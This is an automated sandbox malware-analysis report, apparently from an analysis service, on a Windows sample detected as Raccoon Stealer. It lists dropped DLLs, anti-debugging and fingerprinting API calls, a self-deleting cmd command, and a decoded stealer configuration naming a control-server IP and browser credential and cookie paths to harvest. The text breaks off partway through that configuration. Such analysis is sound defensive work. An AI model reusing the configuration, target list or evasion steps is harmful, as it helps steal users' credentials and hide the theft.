Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_004206DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe TID: 6232	Thread sleep time: -90000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5684	Thread sleep count: 91 > 30

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_00437819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0045C559 IsDebuggerPresent,OutputDebugStringW,

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_00433882 __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree,

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0045A03D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0045A081 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0045A0B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00446C01 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00446625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00440B62 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00440CC5 SetUnhandledExceptionFilter,

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_00440985 cpuid

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0043E03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_004371FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0042C383 __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,

Stealing of Sensitive Information:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must
